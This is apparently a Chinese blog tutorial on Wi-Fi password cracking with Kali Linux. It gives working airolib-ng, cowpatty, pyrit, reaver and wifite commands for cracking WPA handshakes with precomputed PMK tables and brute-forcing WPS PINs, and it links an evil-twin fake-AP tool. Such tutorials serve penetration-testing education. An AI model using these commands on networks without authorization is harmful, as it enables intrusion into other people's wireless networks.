• kali linux之无线渗透(续)


    Airolib

    设计用于存储ESSID和密码列表,计算生成不变的PMK(计算资源消耗型)

     PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)

     通过完整性摘要值破解密码SQLite3数据库存储数据

    实例:

    抓包获取四步信息

    echo 目标ESSID > essid.txt(创建一个ESSID文件)
    airolib-ng db --import essid essid.txt(创建一个数据库db,导入一个essid,这个essid文件存在essid.txt文件里)
    airolib-ng db --stats(查看数据库状态)
    airolib-ng db --import passwd /usr/share/wordlists/xxx.txt(导入密码文件,它会剔除不合格的密码)
    airolib-ng db --batch(生成PMK)
    aircrack-ng -r db test-01.cap(通过抓取到的包对比db数据库里面的PMK破解密码)

    Cowpatty破解密码

    一样的,先抓包获取四步信息

    cowpatty -r xx-01.cap -f password.txt -s 目标essid (-r 指定抓到包的文件,-f 使用的字典,-s 目标essid)

    使用彩虹表(PMK)

    genpmk -f password.txt -d pmk -s 目标essid (-f 使用的字典 -d生成的pmk文件名 -s 目标essid)

    cowpatty -r xx-01.cap -d pmk -s 目标essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目标essid)

    Pyrit破解密码

    与airolib,cowpatty相同,支持基于预计算的pmk提高破解速度

    独有的优势:

    CPU外,可以运用GPU的计算能力加速生成PMK,本身支持抓包获取四步握手过程,无需airodump抓包

    也支持传统的读取airodump抓包获取四步握手的方式

    实例:

    pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的网卡,-o 输出文件名 stripLive是踢出多余的信息)

    然后配合aireplay-ng把目标打掉,获取四步信息

    会生成一个抓包文件

     分析包(analyze)

     从airodump抓包导入并筛选提取出新的包,剔除多余的信息

    会生成新的包

    可以直接用密码字典破解,但是没灵魂,使用数据库模式破解

    默认基于文件的数据库,支持sql数据库,将计算的PMK存入数据库

    查看默认数据库状态:pyrit eval

    导入密码字典:pyrit -i password.txt import_passwords(会剔除不合格的密码)

    指定ESSID:pyrit -e ESSID名 create_essid (创建essid)

    计算PMK:pyrit batch (发挥GPU计算能力)

    破解密码:pyrit -r wap01.cap -b APmac attack_db

    实例:

     导入密码文件

     查看可用密码文件

     创建essid

    计算PMK

    破解密码

    WPS攻击

    WPS是wifi联盟2006年开发的一项技术,通过pin码来简化无线接入的操作,无需记住PSK,路由器和网卡名各按一个按钮就能接入无线.pin码是分为前后各4位的2段共8位数字

    2011年被发现安全漏洞,接入发起方可以根据路由器的返回信息判断前4位是否正确,而pin码的后四位只有1000种定义的组合(最后一位是checksum),所以全部穷举破解只需要11000次尝试,(PSK 218,340,105,584,896),标准本身没有设定锁定机制,目前多个厂商已实现锁定机制

    wash -i wlan0mon (发现支持wps的无线)

     airodump-ng wlan0mon --wps (也可以加上--wps参数)

     爆破PIN码

    reaver -i wlan0mon -b APmac -vv

    爆破出pin码后

    reaver -i wlan0mon -b APmac -vv -p PIN码

      综合自动化无线密码破解工具:wifite

    ctrl+c停止扫描,选择目标

    它会自动逐个尝试,WPS,握手包等等

    伪造AP:3vilTwinAttacker  https://github.com/wi-fi-analyzer/3vilTwinAttacker.git

     

    友情链接  http://www.cnblogs.com/klionsec

                    http://www.cnblogs.com/l0cm

                    http://www.cnblogs.com/Anonyaptxxx

                    http://www.feiyusafe.cn

  • 相关阅读:
    Too many authentication failures for xxxx_username
    [linux]ngrep命令、常见用法
    pip安装icu失败:Command "python setup.py egg_info" failed with error code 1 in
    peewee insert 数据时报错:'buffer' object has no attribute 'translate'
    SQL Server 加密案例解析
    MyBatis学习笔记
    01-hibernate注解:类级别注解,@Entity,@Table,@Embeddable
    01-hibernate注解:类级别注解准备工作
    11-hibernate,单表GRUD操作实例
    10-hibernate单表操作-组件属性
  • 原文地址:https://www.cnblogs.com/Hydraxx/p/10543173.html
Copyright © 2020-2023  润新知